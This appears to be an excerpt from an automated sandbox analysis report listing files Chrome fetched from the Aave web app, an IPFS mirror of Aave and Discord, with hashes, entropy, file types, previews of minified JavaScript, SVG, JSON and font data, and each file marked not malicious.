                                                                                                                                                                                                                                                  MD5:8F8A172D2AA3FC94F0F3888BD2CCF542
                                                                                                                                                                                                                                                  SHA1:DCE3BEAFAC9B31349387E4BFC0A63D134F79615D
                                                                                                                                                                                                                                                  SHA-256:B70612C92071739C483FD36E97F42C089F49DD9FAE59E1AB05874C18913880C3
                                                                                                                                                                                                                                                  SHA-512:9042B00469188511FC857C88370410D5C51B38A4C0F5E1B40BCE320535CA572992F79A8168BA6F8D99131DC42994913B4055B1ABA3570B5FEB487FDAC02E0FD7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/7416.0f6b78b314050ddc.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7416],{96875:function(e,n,r){r.d(n,{o:function(){return h}});var t=r(59499),i=r(4730),o=r(49501),c=r(1279),a=r(62097),s=r(30120),l=r(29630),u=r(75084),d=r(70794),x=r(41024),p=r(85893),f=["value","onInfoClick"];function j(e,n){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var t=Object.getOwnPropertySymbols(e);n&&(t=t.filter((function(n){return Object.getOwnPropertyDescriptor(e,n).enumerable}))),r.push.apply(r,t)}return r}function v(e){for(var n=1;n<arguments.length;n++){var r=null!=arguments[n]?arguments[n]:{};n%2?j(Object(r),!0).forEach((function(n){(0,t.Z)(e,n,r[n])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):j(Object(r)).forEach((function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}))}return e}var h=function(e){var n=e.value,r=e.onInfoClick,t=(0,i.Z)(e,f),j=(0,a.Z)().palette,h=Number((0,c.hE)(n).toFixed(2,d.Z.ROUND_DOWN)),m="";ret
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (16439), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):16439
                                                                                                                                                                                                                                                  Entropy (8bit):5.532133558675556
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:cyPm/vOVBOSFcC0smTz1L0E1b51pfXKDPm2ZVvbNjsrb2pElTkwX:cyPQvGBO3CAR0kBf4bhjsrb2Gl1X
                                                                                                                                                                                                                                                  MD5:D071F37A5E9BE84050A1951BEF0A6266
                                                                                                                                                                                                                                                  SHA1:83FA47D734EBA0F3ECE11CB6030B50B4030AC5B0
                                                                                                                                                                                                                                                  SHA-256:23DB1E64D4FFE1F6F246F43E24F770D0388AF0AF4C0039C57EC61CC1AF3F2EF3
                                                                                                                                                                                                                                                  SHA-512:267D915343B8905233F52C732393AA4AA11DB027DE048207040B566B1847C1DC4599A961C40B3905ED173A1CBEE7A42BCE8AD5253CC303FF4622700FB119C48F
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/3695.9b23cacc12b097a3.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3695],{62753:function(e,r,t){var n=t(64836);r.Z=void 0;var o=n(t(64938)),s=t(85893),a=(0,o.default)((0,s.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");r.Z=a},89722:function(e,r,t){t.d(r,{Z:function(){return b}});var n=t(87462),o=t(63366),s=t(67294),a=t(86010),i=t(94780),l=t(81719),c=t(78884),u=t(36622),d=t(34867);function p(e){return(0,d.Z)("MuiIcon",e)}(0,t(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var f=t(85893);const h=["baseClassName","classNa
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (49123), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):49123
                                                                                                                                                                                                                                                  Entropy (8bit):5.390512090972617
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:emSNQ8tGvds5byT8sF6y/mgw/yNt+T8D6xvQmALj5:emAQ8QG5bY/mgwvTie4b5
                                                                                                                                                                                                                                                  MD5:B8C7A66D6C19776C17B5D93586C539D4
                                                                                                                                                                                                                                                  SHA1:0E63BA06AF5BC6EBB0433BEDDB9A2B0C89F14ADC
                                                                                                                                                                                                                                                  SHA-256:B539932318B22738F86B53EF9BF7BB3BB891EF8140D58936A36518814FDAEFAC
                                                                                                                                                                                                                                                  SHA-512:EFFAB9A44365AA1E757DCA1A9695C947BAAE97CEC3522B477E8B2275C24CFA086E977E3CE86C89109B496E135695AC74E3AAB157536555DC706F3A88B81F2818
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4562],{40342:function(e,t,r){"use strict";r.r(t),r.d(t,{default:function(){return nt}});var n=r(59499),i=r(49501),s=r(30120),a=r(5152),o=r(11163),l=r(67294),c=r(45745),d=r(15446),u=r(25563),x=r(15070),h=r(75331),v=r(80854),p=r(1279),m=r(59148),b=r(27484),j=r.n(b),g=r(42568),f=r.n(g),y=r(83601),w=r(78371),Z=r(67728),C=r(25957),k=r(63263),S=r(52369),A=r(37197),I=r(45104),O=f()((function(e,t,r){return{reserves:e.reservesData,reservesIncentives:r,baseCurrencyData:e.baseCurrencyData,userEmodeCategoryId:t.userEmodeCategoryId,userReserves:t.userReserves}})),D=function(e){var t=(0,S.J)(e),r=(0,I.T)(e),n=(0,A.O)(e);return(0,C.W)([t,r,n],O)},B=r(49258);function M(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function P(e){for(var t=1;t<arguments.length;t++){var r=null!=argument
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4246
                                                                                                                                                                                                                                                  Entropy (8bit):4.103696787604314
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:K9F4GfkbfNyN48/E8jfsrKk1Z/eO4oSgT3I/VcbQokvBD:KnqbfQ48/BfsrKYZ/eOBe9FJD
                                                                                                                                                                                                                                                  MD5:DDA77F765068E4450D3545A40B777663
                                                                                                                                                                                                                                                  SHA1:63AE45EF489734D09D3AEA98E016C0DD1BC733F9
                                                                                                                                                                                                                                                  SHA-256:A644A9364BE96AD0A72F8E24397322B4D0646563A11E8FF76191A9239A561AC9
                                                                                                                                                                                                                                                  SHA-512:D88521109D4AC8EA200F644973A7A554C1A6B8E0AE4658C7F0E3FAFBEE40A1CB8A6A75BECB2A49AE3B8D226BEE36CD8CA63B492FABC2BF034D6A295349567946
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg width="124" height="24" viewBox="0 0 124 24" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#a)"><g clip-path="url(#b)" fill="#fff"><path d="M26.242 2.01A25.218 25.218 0 0 0 19.851 0a18.718 18.718 0 0 0-.819 1.701 23.45 23.45 0 0 0-7.083 0A18.2 18.2 0 0 0 11.121 0a25.13 25.13 0 0 0-6.396 2.015C.68 8.132-.417 14.097.132 19.978c2.682 2.005 5.282 3.223 7.838 4.02A19.514 19.514 0 0 0 9.65 21.23a16.507 16.507 0 0 1-2.644-1.287c.222-.165.439-.337.648-.513 5.098 2.386 10.636 2.386 15.673 0 .211.177.428.348.648.513-.839.505-1.726.939-2.649 1.29A19.432 19.432 0 0 0 23.004 24c2.558-.797 5.16-2.015 7.843-4.022.643-6.817-1.099-12.728-4.605-17.968ZM10.343 16.361c-1.53 0-2.785-1.43-2.785-3.17 0-1.741 1.228-3.174 2.785-3.174 1.557 0 2.812 1.43 2.785 3.174.003 1.74-1.228 3.17-2.785 3.17Zm10.293 0c-1.53 0-2.786-1.43-2.786-3.17 0-1.741 1.228-3.174 2.785-3.174 1.557 0 2.812 1.43 2.785 3.174 0 1.74-1.228 3.17-2.785 3.17ZM41.629 6.122h6.652c1.603 0 2.958.257 4.069.767 1.109.51 1.94 1
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):353
                                                                                                                                                                                                                                                  Entropy (8bit):4.642302632357146
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:3vUqH2fqHd/UkN62LrONwXLjQeoGez2vNijtcdpwr2G+2dCgGTO:fU000hUmJrJLLbNipcdpK+2QDTO
                                                                                                                                                                                                                                                  MD5:67A935AA296D3919EF7040430C582AD0
                                                                                                                                                                                                                                                  SHA1:FD3436E630EC872CD25F97205835AE98DE4F7944
                                                                                                                                                                                                                                                  SHA-256:31964C87D57872F61B1178D809073AB30AC7B1342C78A910E04A88FAEBAB4C14
                                                                                                                                                                                                                                                  SHA-512:CE7DC991E5F74EC4253C2AE95F246859488D6720F33A86F4C92E3C6730C1DCB50A9EA2F486871FAB4C54BD09E616FD8970F524C23A4F1C72948C9748BBFAE082
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/manifest.json
                                                                                                                                                                                                                                                  Preview:{. "short_name": "Aave",. "name": "Aave",. "description": "Non-custodial liquidity protocol",. "iconPath": "aave.svg",. "icons": [. {. "src": "favicon32.png",. "sizes": "32x32",. "type": "image/png". }. ],. "start_url": "./index.html",. "display": "standalone",. "theme_color": "#1B2030",. "background_color": "#ffffff".}.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (65531), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):67149
                                                                                                                                                                                                                                                  Entropy (8bit):5.385384982769821
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:hOpywfFn9AO/DJNxSo2PlPNUxCqUCy2dxmi:+ywfFn9AObxSo2PlPNUxCqUCy27mi
                                                                                                                                                                                                                                                  MD5:1F671A9324158641A39A46BAC7B76452
                                                                                                                                                                                                                                                  SHA1:87CE91E718630648EA6FF26C5427EC00BED48000
                                                                                                                                                                                                                                                  SHA-256:3568D0D7879582204C4538066AF3F136DAA3379DEEC468E6EB89C36180A5473D
                                                                                                                                                                                                                                                  SHA-512:D80B7061C68C5462396EADA40E7CCDCA0AB1581B0282A8160C6DDBC800F10DC433DDAA8533F93A716B21AB2B90E8074B255CCDDB1E4F8C457F0A1FA1E518E8CE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/staking/
                                                                                                                                                                                                                                                  Preview:<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="initial-scale=1, width=device-width"/><title>Aave - Open Source Liquidity Protocol</title><meta name="description" content="Aave is an Open Source Protocol to create Non-Custodial Liquidity Markets to earn interest on supplying and borrowing assets with a variable or stable interest rate. The protocol is designed for easy integration into your products and services."/><meta property="og:title" content="Aave - Open Source Liquidity Protocol"/><meta property="og:description" content="Aave is an Open Source Protocol to create Non-Custodial Liquidity Markets to earn interest on supplying and borrowing assets with a variable or stable interest rate. The protocol is designed for easy integration into your products and services."/><meta property="og:image" content="https://app.aave.com/aaveMetaLogo-min.jpg"/><meta name="twitter:image" content="https://app.aave.com/aaveMetaLogo-min.jpg"/><meta name="twit
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4768), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):4768
                                                                                                                                                                                                                                                  Entropy (8bit):5.531953924670438
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:3a2DXHcwlin8kmlWFxiK97RFuPukdIZS0meUfvQYJxuRMUNmLRSfsxFMuBugtOgf:zDswlwLFxiKbF6VdISr4YJxIL8LRQsxz
                                                                                                                                                                                                                                                  MD5:DC166250138041181DE591E21AA7192A
                                                                                                                                                                                                                                                  SHA1:C4A8A2A91FFC7BB0E31C0E1A77D23E620D679664
                                                                                                                                                                                                                                                  SHA-256:117970265C5AFD32CB55CF648A87AA89AFB4F6D23EB6F8F2691DA508BC208AA8
                                                                                                                                                                                                                                                  SHA-512:E71725052E86E1BA8ACDBC408C5BC6CBE5C96D3C24DBE4A6ED63C9C6FF425D81BE979417A8C925E6EF31F65B0DA527EB98AA7B981FFF8FBC8A42FCBA8B113A66
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/9388.ff9a5272b437e6f3.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9388],{89388:function(e,t,n){n.r(t),n.d(t,{StakeModal:function(){return G}});var r=n(67294),o=n(8195),a=n(31959),i=n(49501),s=n(75331),c=n(1279),u=n(29630),l=n(77912),d=n(60265),p=n(77537),m=n(78371),v=n(84568),k=n(63206),x=n(57609),f=n(54401),b=n(53601),g=n(63491),h=n(67916),j=n(93608),y=n(57824),N=n(78944),T=n(10343),O=n(59499),S=n(50029),A=n(4730),w=n(87794),E=n.n(w),P=n(89291),C=n(67489),_=n(85893),I=["amountToStake","isWrongNetwork","sx","symbol","blocked","selectedToken","event"];function D(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}var U,W=function(e){var t=e.amountToStake,n=e.isWrongNetwork,r=e.sx,o=e.symbol,a=e.blocked,c=e.selectedToken,u=(e.event,(0,A.Z)(e,I)),l=(0,m.Y)(),d=l.stake,p=l.stakeWithPermit,v=c!==s.hj.bpt,k=(0,P.Q)({tryPermit:v,per
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (7029)
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):7078
                                                                                                                                                                                                                                                  Entropy (8bit):5.693672087902241
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:EDHGzBioMyirXyf70li//fZc8Twtv1T5aLdMu951f54aH8L:EDmlioLirXyfYlw/xHWOyuB+acL
                                                                                                                                                                                                                                                  MD5:45A3EE5FF96BDB2DD7FBB2846B5EA494
                                                                                                                                                                                                                                                  SHA1:795E2BB4E00AB75A91BDBA9A4C7D9E2B2E0CD905
                                                                                                                                                                                                                                                  SHA-256:08F280458FAB95C2E5754187C406458A8FE69A1C12329C8EF6CB801067E00BB6
                                                                                                                                                                                                                                                  SHA-512:D545E8F9FE857A5A3AC908E1CCDA13ADCD19EFA78AE34143BCB36080C228090B8C5AE446EFE51C4A87A22BD9403B6E851219B331274D8929EB20AF81E9B159F8
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/1bab9b095996b8d024ce.js
                                                                                                                                                                                                                                                  Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["43222"],{340618:function(r,t,o){var e=o(354848),n=String,c=TypeError;r.exports=function(r){if("object"==typeof r||e(r))return r;throw c("Can't set "+n(r)+" as a prototype")}},442975:function(r,t,o){var e=o(936940);r.exports=!e(function(){function r(){}return r.prototype.constructor=null,Object.getPrototypeOf(new r)!==r.prototype})},33995:function(r){r.exports={IndexSizeError:{s:"INDEX_SIZE_ERR",c:1,m:1},DOMStringSizeError:{s:"DOMSTRING_SIZE_ERR",c:2,m:0},HierarchyRequestError:{s:"HIERARCHY_REQUEST_ERR",c:3,m:1},WrongDocumentError:{s:"WRONG_DOCUMENT_ERR",c:4,m:1},InvalidCharacterError:{s:"INVALID_CHARACTER_ERR",c:5,m:1},NoDataAllowedError:{s:"NO_DATA_ALLOWED_ERR",c:6,m:0},NoModificationAllowedError:{s:"NO_MODIFICATION_ALLOWED_ERR",c:7,m:1},NotFoundError:{s:"NOT_FOUND_ERR",c:8,m:1},NotSupportedError:{s:"NOT_SUPPORTED_ERR",c:9,m:1},InUseAttributeError:{s:"INUSE_ATTRIBUTE_ERR",c:10,m:1},InvalidStateError:{
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 43364, version 3.131
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):43364
                                                                                                                                                                                                                                                  Entropy (8bit):7.995499053027601
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:768:fQelRMAMlg6keZjHGyL9BFjYBuukYbpX4Qb0NJ4rLU7KoYVZ:fQeTWlg6kON8cubbpIb+ggf
                                                                                                                                                                                                                                                  MD5:281BBA49537CF936D1A0DF10FB719F63
                                                                                                                                                                                                                                                  SHA1:4085AD185C5902AFD273E3E92296A4DE3DC19EDD
                                                                                                                                                                                                                                                  SHA-256:B78FB569265B01789E7EDD88CFE02ECB2C3FEE5E1999678255F9B78A3B2CC4E8
                                                                                                                                                                                                                                                  SHA-512:AF988371DB77831F76EDF95A50B9DDF1E957F0230404C8307914F11211E01CC95C61E0768D55AA4347F24E856D226F7E07AC21C09880E49DBD6346D1760B8BFF
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/8234e0a75aa9afb205bd.woff2
                                                                                                                                                                                                                                                  Preview:wOF2.......d.......8..............................x...@..\.`..X..>...........".6.$........ .....K...[.q...c...5.nC...U....?...q.zn.<..-...a..C..J;..8.....s......M.@5.u.F....).'.N..9{U.'..u...|.;W....gz;m.o..&A.....o.........Vm/....a.VNF......T/$..iM......".J(...:.F1.x.}.F....%..Xb.3d%....)Yv..'.th..}..&......k.f..%'..i=@..p..wr.<.i.;...c...13..........i....{.F...&{.....A.]....-...?.....<.....J?.9B.&.f.d.).T...S.. n.*..g7N...w.=...|.!......b..s.........qI<F:...p...y...2.h.+1L.,.mG\..4.E%+r...........o#7F..H.-*.h..R..EXdHY.......(....-J....Mg..%m.5I....]rQo.$M..*m..m...dL.m.n.~....clT.m..=.(..3.*...Cz..p........k...dF?......s...rQ.)}....LS....}._.5......z.....P.B$.T.D..OX.r.5..-1.H..pD..L../.........'....&'\.T.N...........-.}J..Z....y.d!t..#....@.].!P5..S.`.A.`....E.y...k..*d.......p..O.H.7...P...q......4.....U.Y2.w4..E. Y]$Y.R...x.=..+...T7.-O..yH.0/.&....E.q1[.uOO[..=\Q"...,..W\q1\a..).......`acasaacc4s...XXX....e..v.-N.oh)...E%..D......#..CL
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):113
                                                                                                                                                                                                                                                  Entropy (8bit):4.460750616283363
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:YGKjl8jwDEYRrajpHV+wJ6ARORzACDEYkayjY6v:YGKjDRrajpHV9LorMcE
                                                                                                                                                                                                                                                  MD5:30B15D37E2F2C6C09F35BCC56B64571A
                                                                                                                                                                                                                                                  SHA1:A5566ADA13410C39A4059BEC0FF59D51316D89CD
                                                                                                                                                                                                                                                  SHA-256:BE58D93E5BC2C48B3FB9C87BD7140109630195E84CCE67701FCCABCF5256BFE0
                                                                                                                                                                                                                                                  SHA-512:EE8E8192B3120D7A2FC9DCE3585D87FAAF689B2E03046C8B7F533FE3CBA408BF0E8614CA2AACD6ED21A206B4B461ECA507D5B38D01839CA9AC5B93971D1F7B10
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:{"consent_required":false,"country_code":"US","promotional_email_opt_in":{"required":false,"pre_checked":false}}.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (11062), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):11062
                                                                                                                                                                                                                                                  Entropy (8bit):5.361333092820621
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:FDvhWS51K6q4NqMw1AkVYwmW+2YjjBb/KLnRnJh9:jHrNLFBb/KLnRnJh9
                                                                                                                                                                                                                                                  MD5:A43D1BC01F17C751521E0D6B0FB3AFD2
                                                                                                                                                                                                                                                  SHA1:FC984E69D6B6744C976F492A5338AF8114C3837D
                                                                                                                                                                                                                                                  SHA-256:E40F42A162C73CF41BDE24A6C4C7B410CB402648926F0243CAD0EF6A5435D6F6
                                                                                                                                                                                                                                                  SHA-512:71FDC0ACA6961DC1E359A7C498E8E63ADC6F832A05258B84C1975BAE04A9049B772660CD7FF5BBFC501A94E64FFEFB5B7C2265F17AC553D829DD211EAA1C8717
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4787],{99730:function(e,r,t){t.d(r,{f:function(){return c}});var n=t(49501),a=t(30120),o=t(29630),i=t(69331),s=t(67916),u=t(85893),c=function(e){var r=e.txError;return(0,u.jsxs)(a.Z,{children:[(0,u.jsx)(s.Q,{txError:r}),"MetaMask Message Signature: User denied message signature."!==r.rawError.message&&"MetaMask Tx Signature: User denied transaction signature."!==r.rawError.message&&(0,u.jsx)(a.Z,{sx:{pt:4},children:(0,u.jsx)(i.v,{severity:"info",children:(0,u.jsxs)(o.Z,{variant:"description",children:[" ",(0,u.jsx)(n.cC,{id:"Tip: Try increasing slippage or reduce input amount"})]})})})]})}},21732:function(e,r,t){t.d(r,{P:function(){return b}});var n=t(90116),a=t(59499),o=t(50029),i=t(87794),s=t.n(i),u=t(75331),c=t(85945),l=t(67294),d=t(74119),f=t(8195),h=t(77537),p=t(78371),v=t(32113),m=t(39771),y=t(31001),x=t(89291);function g(e,r){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymb
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (11498)
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):11547
                                                                                                                                                                                                                                                  Entropy (8bit):5.655703496467401
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:832FaInJkXD9sQex3Wlp4JG+xyhyTBwFRAD0CoeN1ZL:832UK2XD9sQex3Wj4JG+xS0ylaL
                                                                                                                                                                                                                                                  MD5:C30BEFB4CCFDB0BE1B3D9BEEECD571E9
                                                                                                                                                                                                                                                  SHA1:363088B83B9593F876124847B5AA2B1947A94BDE
                                                                                                                                                                                                                                                  SHA-256:71B7BC585DD170091EF8C6619E68F2CCBF740F252ECF5B9BB46353066E4D6E72
                                                                                                                                                                                                                                                  SHA-512:E1B791A35F189086E1C1BB658A5A0BF2E30992F6D84BA573E5EDA7860E46C939DD4844830A704D88597E4A768132C71BF6D6C0E6C75000CFF88A13554F1F4A8A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["90628"],{231443:function(e){e.exports="/assets/e04bcb7316f7205e85fb.svg"},74830:function(e){e.exports="/assets/23a7a3fd6624342117bf.svg"},206818:function(e){e.exports="/assets/17a91e9b4e7eb3921ed5.svg"},73117:function(e,s,n){e.exports=n.p+"39b91170d9f2309e4c5e.mov"},988868:function(e,s,n){e.exports=n.p+"15aad6b83736f221e23b.mp4"},554355:function(e){e.exports="/assets/fb70c6325a7d728cb6d0.png"},991989:function(e,s,n){e.exports=n.p+"48ad19e80083bee682d2.webm"},787462:function(e,s,n){e.exports=n.p+"a476863d4f441618840f.mov"},635507:function(e,s,n){e.exports=n.p+"87c3abd90e246db4b38a.mp4"},470794:function(e){e.exports="/assets/7df11a68a272724be266.png"},886777:function(e,s,n){e.exports=n.p+"b235c36699192662a3fe.webm"},588705:function(e,s,n){n.d(s,{R:function(){return f}}),n(411104);var t=n(735250),a=n(470079),l=n(442837),r=n(481060),i=n(388905),u=n(686546),o=n(925329),c=n(372769),m=n(726745),d=n(973616),I=
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (27823)
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):27824
                                                                                                                                                                                                                                                  Entropy (8bit):4.511456085175412
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:0Ii43lK1CcPtMjBuvLTBrqDoiba+h3pjeuOXPRTpCLhuYNWv:did3ku3UDbzU9JYcH
                                                                                                                                                                                                                                                  MD5:A0683EE088EA9406D307BE9E2960447B
                                                                                                                                                                                                                                                  SHA1:D649AA45836332D04E25FB8A22C5D0AB50C8E656
                                                                                                                                                                                                                                                  SHA-256:8287C365F0E07BE89937C42A61BC6650C20C73C790541B98E2E34A5558EFAFA6
                                                                                                                                                                                                                                                  SHA-512:EAE9BF786D6ABB1D49BB67A96D017270D3276C28CB7319A7D48C8F6344BF917F0FB3A7067DB19DCE63BC6297FE6CF9E6CFC4E04A8ACE78E8DD197B5FB8A4CA4D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:{"fingerprint":"1289439641425936385.2iX2810xA-ML7otkBLOnF6xqcDA","assignments":[[2810205487,1,1,-1,3,900,0,0],[2617218444,4,1,-1,2,8428,0,0],[3035674767,0,1,-1,0,9744,0,0],[1609782151,0,1,-1,2,1018,0,0],[3643362751,0,1,-1,0,2393,0,0],[3753034466,1,2,-1,0,9026,0,0],[1913882179,0,1,-1,2,4724,0,0],[1567199723,0,1,-1,1,7361,0,0],[454783470,4,1,-1,0,806,0,0],[3450899088,1,1,-1,0,5383,0,0],[3656796460,3,0,-1,3,1663,0,0],[1814483290,0,1,-1,0,6680,0,0],[4221006726,0,1,-1,0,8683,0,0],[1398673921,1,1,-1,0,1486,0,0],[2532700533,0,1,-1,0,4304,0,0],[3557480712,0,1,-1,0,2880,0,0],[853403133,4,1,-1,0,1073,0,0],[2491005019,4,1,-1,0,3347,0,0],[3889077804,2,1,-1,0,7307,0,0],[4079214319,2,1,-1,0,8784,0,0],[1034661306,0,1,-1,0,5004,0,0],[828251710,2,1,-1,1,404,0,0],[3124003316,1,1,-1,0,466,0,0],[2676348506,0,1,-1,0,525,0,0],[4136574802,0,1,-1,1,2112,0,0],[4049571159,0,1,-1,0,5171,0,0],[3182051840,0,1,-1,0,7146,0,0],[2539540256,0,1,-1,3,7031,0,0],[3991298449,2,1,-1,2,9253,0,0],[472975400,6,1,-1,0,2749,0,0]
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):6321
